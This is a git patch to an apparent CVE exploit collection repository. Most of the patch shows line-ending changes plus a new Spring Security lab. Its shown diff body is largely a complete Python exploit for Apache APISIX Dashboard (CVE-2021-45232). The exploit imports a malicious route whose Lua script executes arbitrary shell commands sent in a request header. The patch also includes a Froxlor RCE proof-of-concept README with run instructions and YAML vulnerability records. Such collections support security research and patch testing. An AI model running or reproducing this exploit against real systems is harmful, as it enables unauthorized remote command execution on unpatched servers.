From ebf0faddd7ad214386a35141c6bedd782aad114c Mon Sep 17 00:00:00 2001 
From: zhangqichen131 Date: Thu, 6 Apr 2023 17:35:37 +0800 Subject: [PATCH 1/2] new file: cve/java-spring-security/2022/CVE-2022-22978/.gitignore new file: cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties new file: cve/java-spring-security/2022/CVE-2022-22978/Dockerfile new file: cve/java-spring-security/2022/CVE-2022-22978/README.md new file: cve/java-spring-security/2022/CVE-2022-22978/img.png new file: cve/java-spring-security/2022/CVE-2022-22978/img_1.png new file: cve/java-spring-security/2022/CVE-2022-22978/mvnw new file: cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd new file: cve/java-spring-security/2022/CVE-2022-22978/pom.xml new file: cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java new file: cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java new file: cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java new file: cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java new file: cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties new file: cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html new file: cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html new file: cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java new file: cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java new file: cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml modified: other_list.yaml --- .../cve-2021-45232/apisix_dashboard_rce.py | 184 +- .../2021/yaml/ cve-2021-45232.yaml | 42 +- cve/Froxlor/2023/CVE-2023-0315/README.md | 56 +- cve/Froxlor/2023/yaml/CVE-2023-0315.yaml | 42 +- 
cve/Node.JS/2021/yaml/CVE-2023-1355.yaml | 42 +- cve/Outlook/2023/yaml/CVE-2023-23397.yaml | 36 +- .../CVE-2022-24706/CVE-2022-24706-Exploit.py | 270 +-- .../2022/CVE-2022-24706/README.md | 50 +- .../2022/yaml/CVE-2022-24706.yaml | 62 +- .../DubboProtocolExploit/pom.xml | 120 +- .../main/java/DubboProtocolExploit/Main.java | 314 ++-- .../main/java/DubboProtocolExploit/Utils.java | 440 ++--- .../org/apache/dubbo/demo/DemoService.java | 10 +- .../2021/CVE-2021-43297/ExecTest.java | 14 +- .../2021/CVE-2021-43297/HTTPServer.java | 212 +-- .../2021/CVE-2021-43297/HessianLitePoc.java | 264 +-- .../2021/CVE-2021-43297/README.md | 8 +- .../2021/yaml/CVE-2021-25641.yaml | 38 +- .../2021/yaml/CVE-2021-43297.yaml | 38 +- .../2020/CVE-2020-17518/CVE-2020-17518.py | 60 +- .../2019/CVE-2019-0230/CVE-2019-0230.py | 324 ++-- .../2019/CVE-2019-0230/README.md | 40 +- .../2019/yaml/CVE-2019-0230.yaml | 48 +- .../2020/CVE-2020-13932/poc.py | 44 +- .../2020/yaml/CVE-2020-13932.yaml | 40 +- .../2022/yaml/CVE-2022-42889.yaml | 38 +- cve/apache-log4j/2021/CVE-2021-44228/poc.py | 0 .../2019/CVE-2019-0193/CVE-2019-0193.py | 180 +- cve/apache-solr/2019/CVE-2019-0193/README.md | 16 +- cve/apache-solr/2019/yaml/CVE-2019-0193.yaml | 80 +- .../2020/CVE-2020-13935/.gitignore | 0 cve/apache-tomcat/2020/CVE-2020-13935/LICENSE | 0 .../2020/CVE-2020-13935/README.md | 0 cve/apache-tomcat/2020/CVE-2020-13935/go.mod | 0 cve/apache-tomcat/2020/CVE-2020-13935/go.sum | 0 cve/apache-tomcat/2020/CVE-2020-13935/main.go | 0 .../2022/CVE-2022-29885/CVE-2022-29885.go | 0 .../2022/CVE-2022-29885/README.md | 0 cve/docker/2023/yaml/CVE-2022-37708.yaml | 44 +- cve/gitlab/2020/yaml/CVE-2020-10977.yaml | 38 +- cve/gitlab/2022/CVE-2022-2992/README.md | 194 +-- cve/gitlab/2022/CVE-2022-2992/exploit.py | 104 +- cve/gitlab/2022/CVE-2022-2992/payload_gen.rb | 98 +- cve/gitlab/2022/CVE-2022-2992/server.py | 184 +- cve/gitlab/2022/yaml/CVE-2022-2992.yaml | 52 +- .../2022/CVE-2022-0265/CVE-2022-0265.py | 64 +- 
.../2022/CVE-2022-22947/README.md | 86 +- .../2022/CVE-2022-22947/exploit.py | 150 +- .../2022/yaml/CVE-2022-22947.yaml | 42 +- .../2022/CVE-2022-22978/.gitignore | 58 + .../.mvn/wrapper/maven-wrapper.properties | 2 + .../2022/CVE-2022-22978/Dockerfile | 5 + .../2022/CVE-2022-22978/README.md | 12 + .../2022/CVE-2022-22978/img.png | Bin 0 -> 41580 bytes .../2022/CVE-2022-22978/img_1.png | Bin 0 -> 40601 bytes .../2022/CVE-2022-22978/mvnw | 316 ++++ .../2022/CVE-2022-22978/mvnw.cmd | 188 +++ .../2022/CVE-2022-22978/pom.xml | 68 + .../saferoad/config/SpringSecurityConfig.java | 16 + .../java/cc/saferoad/controller/Demo.java | 21 + .../cve202222978/Cve202222978Application.java | 13 + .../cve202222978/ServletInitializer.java | 15 + .../src/main/resources/application.properties | 1 + .../src/main/resources/templates/index.html | 14 + .../src/main/resources/templates/manage.html | 10 + .../Cve202222978ApplicationTests.java | 13 + .../RegexRequestMatcherTests.java | 17 + .../2022/yaml/CVE-2022-22978.yaml | 22 + .../2022/CVE-2022-22963/CVE-2022-22963-POC.py | 116 +- cve/java-spring/2022/CVE-2022-22963/README.md | 18 +- cve/java-spring/2022/yaml/CVE-2022-22963.yaml | 40 +- .../2021/CVE-2021-42008/README.md | 58 +- .../2021/CVE-2021-43267/exploit.c | 1496 ++++++++--------- cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml | 38 +- .../2021/yaml/CVE-2021-42008.yaml | 40 +- .../2021/yaml/CVE-2021-42327.yaml | 44 +- .../2021/yaml/CVE-2021-43267.yaml | 42 +- cve/linux-kernel/2022/CVE-2022-0185/Makefile | 2 +- cve/linux-kernel/2022/CVE-2022-0185/README.md | 20 +- .../2022/CVE-2022-0847/compile.sh | 0 .../2022/CVE-2022-25636/README.md | 56 +- .../2022/CVE-2022-2588/exp_file_credential | Bin .../2022/CVE-2022-27666/README.md | 32 +- .../2022/CVE-2022-27666/compile.sh | 0 .../2022/CVE-2022-27666/download_symbol.sh | 0 cve/linux-kernel/2022/CVE-2022-27666/run.sh | 0 .../2022/yaml/ CVE-2022-36946.yaml | 34 +- cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml | 44 +- 
cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml | 56 +- .../2022/yaml/CVE-2022-32250.yaml | 36 +- cve/linux-kernel/2023/CVE-2023-0179/Makefile | 24 +- cve/linux-kernel/2023/CVE-2023-0179/helpers.c | 788 ++++----- cve/linux-kernel/2023/CVE-2023-0179/helpers.h | 118 +- cve/linux-kernel/2023/CVE-2023-0179/needle.c | 282 ++-- cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml | 44 +- cve/nvidia/2021/CVE-2021-1056/README.md | 324 ++-- cve/nvidia/2021/CVE-2021-1056/main.sh | 82 +- .../2021/CVE-2021-1056/tf_distr_demo.py | 210 +-- cve/nvidia/2021/CVE-2021-1056/util.sh | 24 +- cve/nvidia/2021/yaml/CVE-2021-1056.yaml | 44 +- cve/openssl/2022/CVE-2022-0778/bad_BN.c | 42 +- cve/openssl/2022/yaml/CVE-2022-3786.yaml | 36 +- cve/polkit/2021/CVE-2021-4115/CMakeLists.txt | 60 +- cve/polkit/2021/CVE-2021-4115/README.md | 104 +- .../2021/CVE-2021-4115/locksessions.cpp | 222 +-- cve/polkit/2021/yaml/CVE-2021-4115.yaml | 44 +- .../2022/CVE-2022-30286/CVE-2022-30286.txt | 34 +- cve/python/2022/CVE-2022-30286/README.md | 48 +- .../2022/CVE-2022-35411/CVE-2022-35411.py | 102 +- cve/python/2022/CVE-2022-35411/README.md | 34 +- cve/python/2022/yaml/CVE-2022-30286.yaml | 46 +- cve/python/2022/yaml/CVE-2022-35411.yaml | 44 +- cve/redis/2022/yaml/CVE-2022-31144.yaml | 46 +- cve/sudo/2019/CVE-2019-18634/.gitignore | 0 cve/sudo/2019/CVE-2019-18634/LICENSE | 0 cve/sudo/2019/CVE-2019-18634/Makefile | 0 cve/sudo/2019/CVE-2019-18634/README.md | 0 cve/sudo/2019/CVE-2019-18634/exploit.c | 0 cve/sudo/2019/yaml/CVE-2019-14287.yaml | 40 +- cve/sudo/2023/yaml/CVE-2023-22809.yaml | 38 +- cve/unzip/2022/yaml/CVE-2022-0529.yaml | 36 +- cve/vim/2021/CVE-2021-3778/other_poc.txt | 10 +- cve/vim/2021/CVE-2021-3778/readme.md | 20 +- cve/vim/2021/yaml/CVE-2021-3778.yaml | 42 +- cve/vim/2023/CVE-2023-0288/readme.md | 200 +-- .../\346\274\217\346\264\236CVE-2023-0512.md" | 214 +-- cve/vim/2023/CVE-2023-1175/README.md | 268 +-- cve/vim/2023/CVE-2023-1264/README.md | 214 +-- cve/vim/2023/yaml/CVE-2023-0288.yaml | 36 +- 
cve/vim/2023/yaml/CVE-2023-0512.yaml | 36 +- cve/vim/2023/yaml/CVE-2023-1264.yaml | 38 +- cve/weblogic/2020/yaml/CVE-2020-14882.yaml | 44 +- cve/webmin/2022/CVE-2022-0824/README.md | 116 +- .../2022/CVE-2022-0824/Webmin-revshell.py | 290 ++-- cve/webmin/2022/yaml/CVE-2022-0824.yaml | 38 +- .../2022/CVE-2022-23131/CVE-2022-23131.py | 72 +- cve/zabbix/2022/CVE-2022-23131/README.md | 8 +- cve/zabbix/2022/yaml/CVE-2022-23131.yaml | 20 - other_list.yaml | 2 + 139 files changed, 6244 insertions(+), 5471 deletions(-) mode change 100755 => 100644 cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py mode change 100755 => 100644 cve/apache-log4j/2021/CVE-2021-44228/poc.py mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/.gitignore mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/LICENSE mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/README.md mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/go.mod mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/go.sum mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/main.go mode change 100755 => 100644 cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go mode change 100755 => 100644 cve/apache-tomcat/2022/CVE-2022-29885/README.md create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/.gitignore create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/Dockerfile create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/README.md create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/img.png create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/img_1.png create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/mvnw create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/pom.xml create mode 100644 
cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java create mode 100644 cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-0847/compile.sh mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-27666/compile.sh mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-27666/run.sh mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/.gitignore mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/LICENSE mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/Makefile mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/README.md mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/exploit.c mode change 100755 => 100644 cve/webmin/2022/CVE-2022-0824/README.md mode change 100755 => 100644 
cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py mode change 100755 => 100644 cve/webmin/2022/yaml/CVE-2022-0824.yaml delete mode 100644 cve/zabbix/2022/yaml/CVE-2022-23131.yaml
diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
index edd12c9f..30ebcda5 100644
--- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
+++ b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
@@ -1,93 +1,93 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + 
"/" + uri) - else: +#!/usr/bin/env python3 +import zlib +import json +import random +import requests +import string +import sys +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single warning from urllib3 needed. +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +eval_config = { + "Counsumers": [], + "Routes": [ + { + "id": str(random.randint(100000000000000000, 1000000000000000000)), + "create_time": 1640674554, + "update_time": 1640677637, + "uris": [ + "/rce" + ], + "name": "rce", + "methods": [ + "GET", + "POST", + "PUT", + "DELETE", + "PATCH", + "HEAD", + "OPTIONS", + "CONNECT", + "TRACE" + ], + "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", + "status": 1 + } + ], + "Services": [], + "SSLs": [], + "Upstreams": [], + "Scripts": [], + "GlobalPlugins": [], + "PluginConfigs": [] +} + + +def random_str(): + return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + + +def calc_crc(data): + crc32 = zlib.crc32(data) & 0xffffffff + return crc32.to_bytes(4, byteorder="big") + + +def export_data(url): + r = requests.get(url + "/apisix/admin/migrate/export", verify=False) + return r.text[:-4] + + +def import_data(url, data): + data = json.dumps(data).encode() + crc32 = calc_crc(data) + + files = {"file": ("data", data + crc32, "text/data")} + resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) + # print(resp.text) + if resp.json().get("code", -1) == 0: + return True + else: + return False + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("python " + sys.argv[0] + " http://127.0.0.1:9000") + exit() + + url = sys.argv[1] + if url.endswith("/"): + url = url[:-1] + + uri = random_str() + eval_config["Routes"][0]["uris"] = [ "/" + uri] + eval_config["Routes"][0]["name"] = uri + + if import_data(url, eval_config): + print("attack success") + print("uri is: " + 
"/" + uri)
+ else:
 print("attack error")
\ No newline at end of file
diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
index ad102017..3041c776 100644
--- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
+++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-45232
-source: https://github.com/wuppp/cve-2021-45232-exp
-info:
- name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
- severity: CRITICAL
- description:
- CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
- scope-of-influence:
- In Apache APISIX Dashboard before 2.10.1
- reference:
- - http://www.openwall.com/lists/oss-security/2021/12/27/1
- - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
- - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
- - https://seclists.org/oss-sec/2021/q4/180
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-45232
- cwe-id: CWE-306
- cnvd-id: None
- kve-id: None
+id: CVE-2021-45232
+source: https://github.com/wuppp/cve-2021-45232-exp
+info:
+ name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
+ severity: CRITICAL
+ description:
+ CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
+ scope-of-influence:
+ In Apache APISIX Dashboard before 2.10.1
+ reference:
+ - http://www.openwall.com/lists/oss-security/2021/12/27/1
+ - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
+ - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
+ - https://seclists.org/oss-sec/2021/q4/180
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45232
+ cwe-id: CWE-306
+ cnvd-id: None
+ kve-id: None
 tags: cve2021
\ No newline at end of file
diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md
index d0fe71ba..cfd00af2 100644
--- a/cve/Froxlor/2023/CVE-2023-0315/README.md
+++ b/cve/Froxlor/2023/CVE-2023-0315/README.md
@@ -1,28 +1,28 @@
-# CVE-2023-0315 Proof-of-Concept
-### Overview
-This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
-It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
-An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
-For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
-
-### Dependencies
-* Froxlor 2.0.3 Stable
-* Python 3.8+
-* `requests` Python Library
-* `beautifulsoup4` Python Library
-* Ubuntu 20.04
-* PHP 8.2
-### Usage
-
-1.Verify the required libraries are installed:
-```
-pip install requests beautifulsoup4
-```
-2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
-
-3.Run the PoC:
-```
-python cve-2023-0315.py
-```
-### Additional Information
-This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
+# CVE-2023-0315 Proof-of-Concept
+### Overview
+This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
+It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
+An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
+For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
+
+### Dependencies
+* Froxlor 2.0.3 Stable
+* Python 3.8+
+* `requests` Python Library
+* `beautifulsoup4` Python Library
+* Ubuntu 20.04
+* PHP 8.2
+### Usage
+
+1.Verify the required libraries are installed:
+```
+pip install requests beautifulsoup4
+```
+2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
+
+3.Run the PoC:
+```
+python cve-2023-0315.py
+```
+### Additional Information
+This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
index 5823536a..d0b9db0d 100644
--- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
@@ -1,21 +1,21 @@
-id: CVE-2023-0315
-source:
- https://github.com/mhaskar/CVE-2023-0315
-info:
- name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
- severity: high
- description: |
- Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
- scope-of-influence:
- Froxlor 2.0.8 之前的版本
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
- - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2023-0315
- cwe-id: CWE-77
- cnvd-id: None
- kve-id: None
- tags: 远程代码执行, RCE
+id: CVE-2023-0315
+source:
+ https://github.com/mhaskar/CVE-2023-0315
+info:
+ name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
+ severity: high
+ description: |
+ Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
+ scope-of-influence:
+ Froxlor 2.0.8 之前的版本
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
+ - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2023-0315
+ cwe-id: CWE-77
+ cnvd-id: None
+ kve-id: None
+ tags: 远程代码执行, RCE
diff --git a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
index e4ffd901..a0a833e0 100644
--- a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
+++ b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-21315
-source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
-info:
- name: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。
- severity: HIGH
- description: |
- Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
- scope-of-influence:
- Node.js-systeminformation<5.3.1
- reference:
- - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525
- - https://security.netapp.com/advisory/ntap-20210312-0007/
- - https://www.npmjs.com/package/systeminformation
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2021-21315
- cwe-id: CWE-78
- cnvd-id: None
- kve-id: None
+id: CVE-2021-21315
+source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
+info:
+ name: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。
+ severity: HIGH
+ description: |
+ Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
+ scope-of-influence:
+ Node.js-systeminformation<5.3.1
+ reference:
+ - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
+ - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525
+ - https://security.netapp.com/advisory/ntap-20210312-0007/
+ - https://www.npmjs.com/package/systeminformation
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-21315
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
 tags: cve2021, 系统入侵
\ No newline at end of file
diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
index 11f0fd08..497f08e0 100644
--- a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
+++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
@@ -1,19 +1,19 @@
-id: CVE-2023-23397
-source: https://github.com/Trackflaw/CVE-2023-23397
-info:
- name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。
- severity: critical
- description: |
- Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
- scope-of-influence:
- outlook-2013, outlook-2016, outlook-2019
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-23397
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-23397
- cwe-id: CWE-294
- cnvd-id: None
- kve-id: None
+id: CVE-2023-23397
+source: https://github.com/Trackflaw/CVE-2023-23397
+info:
+ name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。
+ severity: critical
+ description: |
+ Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
+ scope-of-influence:
+ outlook-2013, outlook-2016, outlook-2019
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-23397
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-23397
+ cwe-id: CWE-294
+ cnvd-id: None
+ kve-id: None
 tags: Microsoft, Outlook, cve2023, 权限提升漏洞
\ No newline at end of file
diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
index 94a6e360..5b9c6d1f 100644
--- a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
+++ b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
